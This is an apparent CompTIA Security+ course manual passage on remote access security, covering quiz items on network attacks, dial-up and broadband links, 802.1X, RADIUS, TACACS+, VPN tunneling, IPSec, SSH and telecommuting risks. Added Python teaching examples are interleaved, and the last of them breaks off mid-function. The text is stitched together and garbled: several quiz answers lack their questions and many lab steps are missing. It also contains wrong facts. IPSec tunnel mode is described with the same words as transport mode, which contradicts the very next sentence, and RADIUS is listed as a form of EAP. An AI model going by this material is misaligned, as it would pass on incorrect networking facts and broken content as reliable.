7 The SYN flood attack exploits the nature of the TCP three-way ______________.
Handshake

9 Pings are used to establish whether a remote host is reachable. True or false?
True

10 A well-known exploit that uses IP packet fragmentation techniques to crash remote systems is called:
A Spoofing
B Smurf
C Ping of Death
D ARP poisoning

11 Smurf is a non-OS-specific attack that uses the network to amplify its effect on the victim. True or false?
True

13 To prevent an internal Smurf attack, you should turn off directed broadcasts on all internal routers. True or false?
True

14 Hunt is a free Linux tool that can monitor traffic on an Ethernet segment. True or false?
True

17 A _________________ __________________ is a program that poses as something else, causing the user to willingly inflict the attack on himself or herself.
Trojan horse
protocols.
D Identify the different vulnerabilities
Communications mediums

The communication medium describes the physical connection between the remote computer and your network. These include:
Dial-up connections
Integrated Services Digital Networks (ISDN)
Digital Subscriber Lines (DSL)
Cable modems

Dial-up connections
Public Switched Telephone Network (PSTN) connections (also called dial-up connections) use analog modems and standard telephone lines to transmit data. They rely on Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) to dial up and connect to a remote access server. (PPP is a data link protocol that provides dial-up access over serial lines. It provides password protection and authentication using the PAP or the stronger CHAP protocols. SLIP is an older data link protocol and has been largely replaced by PPP.) PSTN connections are the cheapest means of data communications, although lack of a local ISP can run up some expensive long-distance bills. Speeds range up to 56 Kbps. From a security standpoint, telephone lines are difficult to sniff, but are susceptible to war dialing. This is an attack where the perpetrator dials all telephone numbers within a specific neighborhood, records those that have modem connections, then redials into the system in an attempt to break into the computer.

ISDN
Integrated Services Digital Network (ISDN) is a telecommunications standard for transmitting voice, video, and data over digital lines. Like PSTN, it relies on SLIP and PPP to communicate. ISDN basic service (BRI) uses two 64 Kbps circuit-switched channels, called B channels, or bearer channels, which can be combined to create higher bandwidth, to carry voice and data. It provides a separate 16 Kbps D channel, or delta channel, for control signals.
Remote access
The D channel is used to signal the telephone company computer to make calls, put them on hold, and activate features such as conference calling and call forwarding. It also receives information about incoming calls, such as the identity of the caller. ISDN also offers two high-end services:
Primary Rate Interface (PRI) is geared for business customers. The North American and Japanese implementation provides 23 64-Kbps B channels and one 64-Kbps D channel for control signals. The European implementation provides 30 B channels and one D channel.
Broadband ISDN (B-ISDN) is geared for enterprise customers. It uses cell switching with rates above 155 Mbps to transport data, voice, and video on a single circuit.
ISDN is noticeably faster than analog modems but significantly slower than DSL connections. Unlike DSL, it can be installed in almost any location.

DSL
Digital Subscriber Line (DSL) sends digital transmissions over ordinary copper telephone lines for high-speed Internet access. DSL technology is available in several forms, collectively referred to as xDSL. Transmission speeds range between 384 Kbps for Internet uploads and 1.54 Mbps for downloads. DSL must be installed within a 5.5 km (18,000 ft.) radius of the phone company's access point. The faster the connection, the closer the subscriber must be to the access point. DSL is more expensive than analog connectivity options. One security issue concerning DSL is that the network connection is always on until the system is switched off or unplugged from the network. This leaves the system vulnerable to hackers.

Cable modem
A cable modem is an external device that allows your computer to connect to the Internet through a cable TV wire. The cable runs from your neighborhood to a central location, referred to as the headend. Additional equipment is installed there that communicates with all the cable modems in subscribers' homes. Cable modems translate radio frequency (RF) signals to and from the cable plant into Internet Protocol (IP). For those who can get it in their area, cable modem service has quickly become a popular high-speed alternative due to competitive costs and very high speeds; however, there are some drawbacks. Since this is a shared server, bandwidth diminishes as more local users simultaneously access the Internet. In addition, as the connection to the Internet is always open, the system is vulnerable to attacks by hackers.
Do it!

A-1:

A PAP and CHAP
B PSTN and SLIP
C SLIP and PAP
D DSL and ISDN
Topic B: Authentication
This topic covers the following CompTIA Security+ exam objective:
#: 2.1
Objective: Recognize and understand the administration of the following types of remote access technologies: 802.1x; TACACS (Terminal Access Controller Access Control System); RADIUS
Security protocols
Explanation
When a corporation adds remote users to its corporate network, it faces a new range of security issues: the users are communicating over an open line, or using remote access applications over the Internet. This enables an unauthorized user to snoop or to launch replay and man-in-the-middle attacks against the network. Authenticating remote users requires additional security measures to ensure data is protected over an unsecured communication medium. First, usernames and passwords must be encrypted. Second, corporate policies, including access control lists, must be maintained. Finally, all communications must be monitored and logged for auditing purposes. The following security protocols provide solutions to these issues:
IEEE 802.1X
Remote Authentication Dial-In User Service (RADIUS)
Terminal Access Controller Access Control System (TACACS+)
IEEE 802.1X
Our discussion of the IEEE 802.1X protocol begins with PPP. PPP is a protocol for communication between two computers using a serial interface, typically a personal computer connected by phone line to a server. Once the connection is established, PPP can negotiate an authentication protocol to authenticate the user. The traditional authentication method has been either PAP or CHAP, although PAP is not considered secure. Extensible Authentication Protocol (EAP) extended the capabilities of PPP to encompass a range of new authentication methods, including token cards, one-time passwords, certificates, and biometrics. It describes standards to ensure compatibility and interoperability between the remote user, an access point or switch, and an authentication server, such as RADIUS. EAP deals exclusively with the authentication process. IEEE 802.1X provides a standard for authenticating and controlling user traffic to a protected network. It does not provide the actual authentication mechanism, but instead uses the EAP protocol to define how authentication takes place.
There are several forms of EAP offering different levels of security and support for wired and wireless LANs:
EAP over IP (EAPoIP)
EAP over LAN (EAPOL)
Message Digest Algorithm/Challenge-Handshake Authentication Protocol (EAP-MD5-CHAP)
Transport Layer Security (EAP-TLS)
Tunneled Transport Layer Security (EAP-TTLS)
RADIUS
Light Extensible Authentication Protocol (LEAP), from Cisco

IEEE 802.1X conversation
Depending on the version of EAP running, the authentication exchange will vary. The following exchange describes a wireless LAN using 802.1X:
1 A client (known as the supplicant) tries to connect to a wireless access point (known as the authenticator).
2 The access point (authenticator) detects the client and enables the client's port. It forces the port into an unauthorized state, so only 802.1X traffic is forwarded. All other traffic, such as HTTP, DHCP, and POP3 packets, is blocked.
3 The supplicant sends an EAP-start message.
4 The authenticator sends an EAP-request identity message requesting the user's identity.
5 The supplicant sends the identity to the authenticator.
6 The authenticator forwards the identity to the authentication server. The authentication server might use RADIUS, although 802.1X does not specify it.
7 The authentication server authenticates the user. The result is either an accept or a reject packet.
8 The authentication server returns the result to the authenticator.
9 Upon receiving the accept packet, the authenticator opens the client's port for other types of traffic.
10 At logoff, the client sends an EAP-logoff message. This forces the access point to transition the client port to an unauthorized state.
Exhibit 4-1 uses a RADIUS server as an example.
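The ten-step exchange above as a runnable model, added here and not taken from the manual. It assumes a constructed user table in place of the RADIUS server's database and, for simplicity, passes the credential alongside the identity rather than inside an EAP method; the point it shows is the port state: nothing but 802.1X traffic passes until an accept arrives, and EAP-logoff closes the port again.

```python
"""Model of the ten-step IEEE 802.1X exchange described above.

Added example, not code from the manual. Message names follow the text
(EAP-Start, EAP-Request/Identity, accept/reject); the classes, the
constructed user table, and the credential check are this example's own
simplifications of what a RADIUS server would do.
"""
from dataclasses import dataclass, field

# Constructed credential store standing in for the authentication server's database.
USER_DB = {"alice": "correct horse", "bob": "battery staple"}

EAPOL = "EAPOL"   # 802.1X traffic: the only kind forwarded on an unauthorized port


class AuthenticationServer:
    """Step 7: checks the forwarded identity and answers accept or reject."""

    def __init__(self, users):
        self.users = users

    def authenticate(self, identity, credential):
        if self.users.get(identity) == credential:
            return "Access-Accept"
        return "Access-Reject"


@dataclass
class Authenticator:
    """The access point: owns the client's port state (steps 2, 9 and 10)."""
    server: AuthenticationServer
    port_authorized: bool = False
    log: list = field(default_factory=list)

    def forward(self, traffic_type):
        """Step 2: while the port is unauthorized only EAPOL frames pass."""
        allowed = self.port_authorized or traffic_type == EAPOL
        if not allowed:
            self.log.append(f"blocked {traffic_type} on unauthorized port")
        return allowed

    def handle_eap_start(self):
        """Steps 3-4: answer the supplicant's EAP-Start with a request for identity."""
        self.log.append("EAP-Request/Identity")
        return "EAP-Request/Identity"

    def handle_identity(self, identity, credential):
        """Steps 6-9: relay the identity to the server and act on the result."""
        self.log.append(f"forward identity {identity!r} to authentication server")
        result = self.server.authenticate(identity, credential)
        self.port_authorized = (result == "Access-Accept")
        state = "authorized" if self.port_authorized else "unauthorized"
        self.log.append(f"{result}: port {state}")
        return result

    def handle_eap_logoff(self):
        """Step 10: EAP-Logoff forces the port back to the unauthorized state."""
        self.port_authorized = False
        self.log.append("EAP-Logoff: port unauthorized")


def supplicant_session(authenticator, identity, credential):
    """Runs steps 1-10 from the supplicant's side and records what got through."""
    history = []
    history.append(("port on connect", authenticator.port_authorized))   # steps 1-2
    history.append(("http before auth", authenticator.forward("HTTP")))  # blocked
    authenticator.forward(EAPOL)                                          # step 3 passes
    authenticator.handle_eap_start()                                      # step 4
    result = authenticator.handle_identity(identity, credential)          # steps 5-9
    history.append(("auth result", result))
    history.append(("http after auth", authenticator.forward("HTTP")))
    authenticator.handle_eap_logoff()                                     # step 10
    history.append(("http after logoff", authenticator.forward("HTTP")))
    return history


if __name__ == "__main__":
    ap = Authenticator(AuthenticationServer(USER_DB))
    for entry in supplicant_session(ap, "alice", "correct horse"):
        print(entry)
    print("\n".join(ap.log))
```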
Exhibit 4-1: IEEE 802.1X conversation

For information on the latest developments on IEEE standards, visit the following Web site:
http://www.ieee.org
Do it!

B-1:

A Extended Authorization Protocol
B Extended Authentication Protocol
C Extensible Authentication Protocol
D Extensible Administrative Protocol

A Supplicant, authenticator, authenticating server
B RADIUS client, authenticator, authenticating server
C Supplicant, RADIUS server, authenticating server
D Supplicant, ISP, authenticator
8 After this information is received by the NAS, it enables the necessary configuration to deliver the right network services to the user. This process is shown in Exhibit 4-2.

Exhibit 4-2: RADIUS

Benefits
The distributed approach to network security provides a number of benefits:
Greater security: The RADIUS client/server architecture allows all security information to be located in a single, central database, instead of scattered around a network in several different devices. A single UNIX system running RADIUS is much easier to secure and manage than several communications servers located throughout a network.
Scalable architecture: RADIUS creates a single, centrally located database of users and available services, a feature particularly important for networks that include large modem banks and more than one remote communications server. The RADIUS server manages the authentication of the user and the access to services from one location. Any device that supports RADIUS can be a RADIUS client, so a remote user can gain access to the same services from any communications server communicating with the RADIUS server.
Open protocols: RADIUS is fully open, is distributed in source code format, and can be adapted to work with systems and protocols already in use. This feature potentially saves tremendous amounts of time by allowing organizations to modify the RADIUS server to fit their network rather than rework their network to incorporate the NAS. RADIUS can be modified for use with most security systems on the market and works with any communications device that supports the RADIUS client protocol. The RADIUS server has modifiable stubs that enable customers to customize it to run with most security technologies.
Future enhancements: As new security technology becomes available, the customer can take advantage of that security without waiting for added support in the NAS. The new technology need only be added to the RADIUS server by the customer or an outside resource. RADIUS also uses an extensible architecture, which means that as the type and complexity of service the NAS is required to deliver increases, RADIUS can be expanded to provide those services.

Do it!

B-2:

VPN server
Wireless access point
Network access server
Windows workstation
TACACS+ uses TCP for its transport (unlike RADIUS, which uses UDP). TCP offers several advantages over UDP, primarily connection-oriented transmission. Because RADIUS uses UDP, it requires additional functions such as retransmit attempts and time-outs to compensate for the connectionless transmission. Using TCP offers a separate acknowledgement that a request has been received within the network, regardless of how loaded or slow the authentication mechanism might be. It also provides immediate indication of a crashed server, because acknowledgements would not be forthcoming. While RADIUS encrypts only the password in the packet passed from client to server, TACACS+ encrypts the entire body of the packet, including username, authorized services, and other information. Because RADIUS combines the authentication and authorization packets, it is difficult to separate these functions. TACACS+ separates authentication, authorization, and accounting, which allows for separate authentication solutions: a user can log on using a Kerberos server for authentication and a TACACS+ server for authorization and accounting.
If students are not familiar with the protocols, you can briefly describe them.
Another advantage to using TACACS+ is that it offers multiple protocol support while RADIUS does not. Specifically, AppleTalk Remote Access, NetBIOS Frame Protocol Control, Novell Asynchronous Services Interface, and X.25 PAD connections cannot be supported by RADIUS. TACACS+ is able to support all of these protocols.
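To make the password-only versus whole-body contrast concrete, here is an added example (not from the manual) that implements the two protocols' standard hiding schemes from their RFCs, RADIUS User-Password hiding (RFC 2865 section 5.2) and TACACS+ body obfuscation (RFC 8907 section 4.5), and checks which credential strings remain readable in the resulting bytes. The shared secret, Request Authenticator, session id, credentials and the username/NUL/password body layout are constructed sample values.

```python
"""What each protocol leaves readable on the wire, as the text contrasts.

Added example, not code from the manual. It implements the standard
hiding schemes in pure Python: RADIUS User-Password hiding (RFC 2865
section 5.2) and TACACS+ body obfuscation (RFC 8907 section 4.5). The
shared secret, Request Authenticator, session id, credentials and the
username/NUL/password body layout are constructed sample values.
"""
import hashlib
import os

SHARED_SECRET = b"constructed-shared-secret"


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def radius_hide_password(password, secret, request_authenticator):
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each block with
    MD5(secret + previous ciphertext block), seeded by the Request
    Authenticator. Only this attribute is obscured; the rest is cleartext."""
    if len(request_authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_authenticator
    for i in range(0, len(padded), 16):
        block = _xor(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out += block
        prev = block
    return out


def radius_reveal_password(hidden, secret, request_authenticator):
    """Inverse of radius_hide_password, as performed by the RADIUS server."""
    out, prev = b"", request_authenticator
    for i in range(0, len(hidden), 16):
        out += _xor(hidden[i:i + 16], hashlib.md5(secret + prev).digest())
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def radius_access_request_attrs(username, password, secret, request_authenticator):
    """Attribute bytes of an Access-Request: User-Name (type 1) in the clear,
    User-Password (type 2) hidden. The packet header is omitted."""
    hidden = radius_hide_password(password, secret, request_authenticator)
    return (bytes([1, 2 + len(username)]) + username
            + bytes([2, 2 + len(hidden)]) + hidden)


def tacacs_obfuscate(body, key, session_id, version=0xC0, seq_no=1):
    """RFC 8907 4.5: XOR the whole body with a chained MD5 pseudo-pad built
    from session id, key, version and sequence number. Applying it twice
    with the same inputs restores the body (the server side)."""
    if len(session_id) != 4:
        raise ValueError("session_id must be 4 bytes")
    pad, prev = b"", b""
    while len(pad) < len(body):
        prev = hashlib.md5(session_id + key + bytes([version, seq_no]) + prev).digest()
        pad += prev
    return _xor(body, pad[:len(body)])


def compare_exposure(username, password, secret, request_authenticator=None, session_id=None):
    """Which credential strings appear verbatim in each protocol's wire bytes."""
    request_authenticator = request_authenticator or os.urandom(16)
    session_id = session_id or os.urandom(4)
    radius_wire = radius_access_request_attrs(username, password, secret, request_authenticator)
    tacacs_body = username + b"\x00" + password      # constructed body layout
    tacacs_wire = tacacs_obfuscate(tacacs_body, secret, session_id)
    return {
        "radius_username_visible": username in radius_wire,
        "radius_password_visible": password in radius_wire,
        "tacacs_username_visible": username in tacacs_wire,
        "tacacs_password_visible": password in tacacs_wire,
    }


if __name__ == "__main__":
    for name, visible in compare_exposure(b"alice", b"s3cret", SHARED_SECRET).items():
        print(f"{name}: {visible}")
```

The RADIUS username (and every other attribute) is readable to anyone sniffing the segment between NAS and server, which is why RADIUS traffic should stay on a protected management network even though the password itself is hidden.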
Do it!

B-3:

Here's how
1 Click Start
2 Right-click My Computer and choose Manage
3 Expand Local Users and Groups and select Users
4 Double-click Administrator
5 Activate the Dial-in tab, select Allow access, and click OK
6 Double-click User1 and repeat step 5
7 Double-click User2 and repeat step 5
8 Close the Computer Management window
Types of VPNs
Explanation
A virtual private network (VPN) is a tool that enables the secure transmission of data over unsecured networks, such as the Internet. Remote sites and users are able to access their network information as if using a private network (hence the name virtual private network) without the costs associated with long-distance calls or leased lines. A VPN uses security procedures and tunneling protocols to maintain privacy. Tunneling enables a foreign protocol to travel across a network by encapsulating (wrapping) it inside the packets of the host network. The security protocols supply an additional level of security by encrypting the data before transmission. There are two types of VPN commonly used in corporate networks:
Site-to-site VPN
Remote access VPN
Site-to-site VPN
Site-to-site VPNs allow a corporation to connect to branch offices or other companies over a public network. Each site requires a VPN gateway (dedicated hardware or a router running VPN server software) to connect to the Internet. The gateway-to-gateway architecture logically operates as a WAN, connecting offices through multiple private tunnels across the Internet. All locations must use identical encryption and encapsulation protocols and settings; PPTP, L2TP and IPSec are the most common. Each local area network connects to the Internet with a router. In order to receive incoming calls, the corporate hub router employs dedicated lines to connect permanently to a local ISP; branch offices might use either dedicated lines or dial-up. In both cases, the routers establish a secure tunnel across the Internet.
Exhibit 4-4: Client-side tunneling

An alternative to installing or configuring the client computer to initiate the necessary security communications is to outsource the VPN to a service provider. With this type of configuration, there is no need for the company to maintain client-side software or configurations. When implementing this type of solution, however, encryption does not happen until the data reaches the provider's network.
This results in an unsecured connection from the user's computer to the provider's network access server, as shown in Exhibit 4-5. This also places the responsibility for protecting corporate access to information with an external entity.

Exhibit 4-5: Service provider tunneling

In this scenario, remote users dial in to a service provider's network or point of presence (POP) via a local or toll-free number. The service provider, in turn, initiates a secure encrypted tunnel to the corporate network. If security is of high concern, this type of implementation might not be the best choice.
VPN drawbacks
Cost benefits and flexibility aside, using VPNs does have its problems. VPN devices are not completely fault tolerant, although there are efforts underway to address this issue. In addition, there are diverse choices when implementing VPNs. Software solutions tend to have trouble processing the multitude of simultaneous connections that occur on a large network. This problem can be mitigated by using a hardware solution, but that requires a much higher cost. It's also important to remember there is no such thing as absolute security. As more security is added to a network, project costs increase and simplicity suffers, according to a law of diminishing returns: each incremental increase in security over a certain point becomes more and more expensive. A proper balance in these issues must be determined and maintained.

Do it!

C-1:

Here's how / Here's why
This activity takes place only at Server-X.
(To configure the server. The Routing and Remote Access Server Setup Wizard will begin.)
Click Next
5 Select the network interface that connects this server to the Internet, then click Next
6 Click Next
(To accept the default of automatically assigning IP addresses to remote clients.)
7 Click Next
(To accept the default value of No, use Routing and Remote Access to authenticate connection requests.)
(To start the Routing and Remote Access service.)
(If prompted about configuring the DHCP Relay Agent.)
Do it!

C-2: Understanding VPNs
Tunneling protocols
Explanation
Tunneling hides or encapsulates the original packet inside a new packet. The new packet has new addressing and routing information, which enables it to travel across networks. When the new packet arrives at the destination network, the tunneling protocols are stripped away, exposing the original packet. Two commonly used tunneling protocols are Point-to-Point Tunneling Protocol (PPTP) and Layer Two Tunneling Protocol (L2TP).

Point-to-Point Tunneling Protocol (PPTP)
The Point-to-Point Tunneling Protocol (PPTP) is built upon the well-established Internet protocols of PPP (Point-to-Point Protocol) and Transmission Control Protocol/Internet Protocol (TCP/IP). PPP provides authentication, encryption, and compression of data sent over analog telephone lines. TCP/IP provides a transport mechanism for conveying digital data over the Internet infrastructure. When a user phones into an ISP to connect to the Internet, the data is sent to the ISP over a PPP connection but is then repackaged for transport over the Internet. This process uses tunneling. In the case of data sent over phone lines, the original data packets are encapsulated within a PPP packet using Generic Routing Encapsulation Protocol version 2 (GRE v2). PPTP then encrypts and encapsulates the PPP packets within IP datagrams for transmission through the Internet. PPTP does much more than deliver messages. After a PPTP link has been established, it provides its users with a virtual node on the corporate LAN or WAN. PPTP uses Microsoft Point-to-Point Encryption (MPPE) to encrypt the data packets, and an authentication protocol such as PAP or CHAP to verify users' identities before granting access to the corporate network. PPTP employs TCP packets to perform status inquiry and signaling over the network.
The control packets are transmitted over a separate control channel and perform the following tasks:
Query the status of communications servers
Provide in-band management
Allocate channels and place outgoing calls
Notify Windows NT/2000/Server 2003 servers of incoming calls
Transmit and receive user data with bi-directional flow control
Notify Windows NT/2000/Server 2003 servers of disconnected calls
Assure data integrity, while making the most efficient use of network bandwidth by tightly coordinating the packet flow

Layer Two Tunneling Protocol (L2TP)
Layer Two Tunneling Protocol (L2TP) combines the best features of PPTP with the L2F protocol created by Cisco Systems to provide tunneling capabilities over IP, X.25, Frame Relay, and Asynchronous Transfer Mode (ATM) infrastructures. L2TP uses UDP to encapsulate PPP frames within L2TP headers as the tunneled data. As it has no native encryption capabilities, L2TP must rely on other encryption technologies, such as IPSec, to encrypt the data frames. Authentication is accomplished using TACACS+ or RADIUS.
IP Security protocol
IP Security Protocol (IPSec) is a suite of protocols used for encrypting data so it can travel securely over a public IP network. It uses OSI layer 3, the network layer, to send encrypted communications between two network devices. It's commonly used to secure VPN communications over an open network.

IPSec protocols
The IPSec protocol suite is made up of four separate protocols:
Authentication Header (AH) protocol signs the data packets using MD5 or SHA1 hashes and a shared secret key. This guarantees authenticity.
Encapsulating Security Payload (ESP) protocol encrypts the packet using a symmetric encryption algorithm (DES or 3DES) and a shared secret key. This ensures confidentiality.
IP Payload Compression Protocol (IPComp) compresses the data packet before transmission. When used in combination with ESP encryption, the compression is applied to the packet before encryption.
Internet Key Exchange (IKE) provides an automated method for negotiating the shared secret keys.
The protocols might be applied alone or in combination.

IPSec encryption modes
IPSec also offers two modes of encryption: transport and tunnel.
Transport mode encrypts the data portion of each packet, but not the header. This mode is used in host-to-host (peer-to-peer) communications.
Tunnel mode encrypts the data portion of each packet, but not the header. Tunneling allows you to hide the source and destination addresses from hackers. This mode is used by VPN gateways.
To use IPSec, both the sender and the recipient must be IPSec compliant.
To communicate using IPSec, the following steps must take place:
1. An administrator creates an IPSec policy. This contains a set of rules that define which types of traffic (for example, HTTP or FTP) require protection and which encryption and/or authentication protocols to use. Each rule can specify multiple authentication methods.
2. The administrator distributes the IPSec policy to all targeted machines.
3. The two hosts automatically negotiate the authentication and encryption methods to be used. Which protocols are selected depends on the IPSec policy.
4. If the selected protocol requires negotiated secret keys, IKE is used. The peers first authenticate each other by one of three methods:
   - Both parties use a password known as a pre-shared key. Each side proves knowledge of the key by exchanging keyed hashes derived from it; if both sides can reproduce the other's value, secure communication begins.
   - Both parties exchange public keys in certificates issued by a CA.
   - Both parties use Kerberos v5 for authentication (an option specific to Windows IPSec).
5. The IP packets are encrypted and/or signed according to the negotiated terms.
All functions of IPSec remain transparent to the user.
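The difference between what AH protects and what the two ESP modes hide is easier to see in code than in prose. The following is an added example, not part of the course material and not an IPSec implementation: it models a packet as a constructed 8-byte header (source and destination address) plus a payload, uses HMAC-SHA1 from the standard library for the AH-style integrity check, and stands in a SHA-256 keystream for DES/3DES (it is not a real cipher and must never be used as one). The key, the addresses and the payload are constructed for the demonstration.

```python
"""Added example: what AH and ESP transport/tunnel mode cover on the wire."""
import hashlib
import hmac
from dataclasses import dataclass


def ip_to_bytes(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))


@dataclass
class Packet:
    src: str
    dst: str
    payload: bytes

    def header(self) -> bytes:
        # Constructed 8-byte stand-in for an IP header: source, then destination.
        return ip_to_bytes(self.src) + ip_to_bytes(self.dst)

    def wire(self) -> bytes:
        return self.header() + self.payload


def toy_keystream(key: bytes, length: int) -> bytes:
    # Stand-in for DES/3DES: SHA-256 in counter mode. Teaching aid only.
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def toy_encrypt(key: bytes, data: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, toy_keystream(key, len(data))))


toy_decrypt = toy_encrypt  # XOR with the same keystream is its own inverse


# --- AH: keyed hash over header + payload; nothing is hidden ---
def ah_sign(key: bytes, pkt: Packet) -> bytes:
    return hmac.new(key, pkt.wire(), hashlib.sha1).digest()


def ah_verify(key: bytes, pkt: Packet, tag: bytes) -> bool:
    return hmac.compare_digest(ah_sign(key, pkt), tag)


# --- ESP transport mode: payload encrypted, original header in the clear ---
def esp_transport(key: bytes, pkt: Packet) -> bytes:
    return pkt.header() + toy_encrypt(key, pkt.payload)


# --- ESP tunnel mode: whole original packet encrypted behind a new outer header ---
def esp_tunnel(key: bytes, pkt: Packet, gw_src: str, gw_dst: str) -> bytes:
    outer = Packet(gw_src, gw_dst, b"")
    return outer.header() + toy_encrypt(key, pkt.wire())


def esp_tunnel_open(key: bytes, wire: bytes) -> Packet:
    inner = toy_decrypt(key, wire[8:])
    src = ".".join(str(b) for b in inner[0:4])
    dst = ".".join(str(b) for b in inner[4:8])
    return Packet(src, dst, inner[8:])


def addresses_visible(wire: bytes, pkt: Packet) -> bool:
    """True if the original packet's addresses appear in the clear on the wire."""
    return pkt.header() in wire


KEY = b"shared-secret-from-IKE"  # constructed; IKE would negotiate this
INNER = Packet("10.1.1.5", "10.2.2.9", b"GET /payroll HTTP/1.0\r\n")  # constructed


def demo() -> dict:
    tag = ah_sign(KEY, INNER)
    tampered = Packet(INNER.src, INNER.dst, INNER.payload.replace(b"payroll", b"public!"))
    transport = esp_transport(KEY, INNER)
    tunnel = esp_tunnel(KEY, INNER, "203.0.113.1", "198.51.100.1")
    return {
        "ah_ok": ah_verify(KEY, INNER, tag),
        "ah_tampered": ah_verify(KEY, tampered, tag),
        "transport_addrs_visible": addresses_visible(transport, INNER),
        "tunnel_addrs_visible": addresses_visible(tunnel, INNER),
        "tunnel_roundtrip": esp_tunnel_open(KEY, tunnel) == INNER,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running it shows the three points the text makes: AH detects a single changed byte but hides nothing, transport mode leaves the real endpoints visible, and only tunnel mode removes the inner addresses from the wire while the gateway can still reconstruct the original packet.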
Secure Shell
Secure Shell (SSH) is a secure replacement for remote logon and file transfer programs such as Telnet and FTP, which transmit everything, passwords included, in unencrypted text. SSH uses public key cryptography to establish an encrypted and authenticated connection from the user's machine to the remote machine: the client checks the server's host key before any credentials are sent. Once the secure connection is established, the username, password (or the user's own public key credential), and all other data travel over it. SSH has become a standard for remote logon and administration. It is so widely used that there are ports of SSH for many platforms and free clients for logging on to an SSH server from almost any system.

The rest of this topic describes SSH Certifier, a certificate authority product from SSH Communications Security that is separate from the SSH protocol itself. SSH Certifier is designed to be widely applicable and runs on a variety of platforms, including Windows, Linux, HP-UX, and Solaris. In the enrollment process, the end user requesting a certificate must be authenticated. If the entity already has a valid certificate, its private key can be used for authentication with certain enrollment protocols; however, a first-time user typically has no such key. First-time authentication can be done either manually or by generating shared secrets for entities. When shared keys are delivered to end entities by secure means, users can authenticate themselves during online enrollment, and the request can be approved automatically if the policy allows automatic acceptance. This method is especially useful where the shared secret can be delivered in the same package as the client software and the certification authority's certificate. If the enrollment protocol does not support shared secrets, or they are simply not used, authentication must be done out of band, for example by the user presenting valid identity information to the operator, who then makes the approval decision manually.
Tell students that in SSH, the server's public host key is checked before the session is established and before any password is sent. Mention that SSH is rapidly replacing Telnet for remote administration of UNIX and Linux systems, and even some Windows systems.
CompTIA Security+ Certification
The authentication requirements and the certificate templates for certificate issuance are defined in the certification policy, which is configured through the administration graphical user interface. The key components of SSH Certifier are the engine, the administration server, the enrollment gateway, and the publishing server. These components can be placed on separate machines or on a single machine.
- The engine receives certification requests from the enrollment gateway, makes policy decisions, and generates and signs certificates and Certificate Revocation Lists (CRLs). It also communicates with the administration server and performs the required database queries.
- The administration server is an HTTP server with a Transport Layer Security (TLS) implementation. Its graphical user interface can be customized by modifying the HTML, and its functionality can be extended with Certifier's scripting tools.
- The enrollment gateway contains the server-side implementations of the supported certificate enrollment protocols. It receives certificate requests from enrollment clients and forwards them to the engine for policy decisions. It also sends confirmation messages and delivers issued certificates to end entities.
- The publishing server receives the issued certificates and CRLs and publishes them in the directory via LDAP.
For more information on IPSec and SSH, visit www.ssh.com.
Do it!
C-3: Using PPTP to connect to a VPN server
Students will perform this activity in pairs on Server-X and Server-Y as indicated in the activity steps. If students are prompted to provide Location information, tell them to enter an area code and click OK twice.
Here's how / Here's why
1. On Server-Y, click Start.
2. Choose Control Panel, Network Connections, New Connection Wizard.
7. Enter the IP address of the VPN server (Server-X) and click Next. If you don't know Server-X's IP address, have your partner open a Command window, enter ipconfig, and note the server's IP address.
8. Select Anyone's use and click Next.
9. Check Add a shortcut to this connection to my desktop.
You are prompted to log on; after logging on, you are connected to Server-X. To configure the Administrator account to require a remote access policy for access, activate the Dial-in tab in the Properties of the Administrator user to see the option.
14. At Server-Y, disconnect the Class VPN PPTP connection and try to connect again. The connection is denied because an appropriate remote access policy has not yet been configured.
15. Close all windows.
Do it!
C-4:
2. Data sent from a dial-up modem is encapsulated within a(n) _______ packet.
4. L2TP uses UDP to encapsulate PPP frames with L2TP headers. True or false?
True
7. Which IPSec protocol authenticates each packet with a keyed hash over the packet but does not encrypt it?
Authentication Header (AH)
8. Which IPSec protocol uses symmetric encryption to encrypt the IP payload for confidentiality?
Encapsulating Security Payload (ESP)
Remote access
Telecommuting
Explanation
Many large companies have begun using remote access technologies to reduce costs and improve employee satisfaction. The benefits of telecommuting must be weighed carefully against the added exposure. In the telecommuting model, the home office cannot be treated as trusted: with no physical access control, a machine that was trustworthy when first configured is of unknown state after it has spent time in a user's home.
Security issues
Although VPNs and encryption are powerful tools, they do not protect against all threats. Misconfigured firewalls, unrestricted physical access, weak encryption, and sporadic auditing leave the remote PC an easy target for attackers.

Split tunneling
The simplest VPN configuration is a VPN client computer with an Internet connection. This setup can introduce a major risk called split tunneling. Split tunneling allows a remote PC to browse the Web and access the corporate VPN simultaneously: only traffic destined for the corporate network goes through the tunnel, and everything else goes straight to the Internet. The benefit is that corporations conserve Internet bandwidth at VPN hub sites and reduce the load on VPN gateways. The drawback is that a remote PC connected directly to the Web while tied into the VPN is reachable from the Internet; an attacker who commandeers the PC gains a path into the corporate network through the tunnel. The integrity of the remote PC can just as easily be compromised while the user browses with the VPN tunnel turned off: viruses or back doors downloaded while browsing threaten the VPN the next time it is connected.

Unsecured data files
As telecommuters download data files to their home PCs, the safeguards implemented at the corporate office to protect sensitive information no longer apply. The central office has effectively lost control over that data. With limited physical protection, attackers can steal portable computers or hard drives and, given enough time, defeat whatever local security is in place. The attacker then has the corporate data and, potentially, a path into the corporate network.
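Whether a client is split-tunneling is a routing-table question: is the corporate prefix reached through the VPN adapter while the default route still goes out the local interface? The following is an added example, not part of the course material and not any VPN vendor's code, that applies that check to constructed routing-table text in the format of the Linux `ip route` command. The interface name `tun0` and the prefixes are assumptions for the demonstration; the second table shows the two /1 routes that OpenVPN's full-tunnel option installs to override the default route.

```python
"""Added example: detect split tunneling from an 'ip route' style routing table."""
import ipaddress
from dataclasses import dataclass


@dataclass
class Route:
    prefix: ipaddress.IPv4Network   # 0.0.0.0/0 for the default route
    dev: str


def parse_ip_route(text: str) -> list:
    """Parse the subset of 'ip route' output we need: destination prefix and device."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
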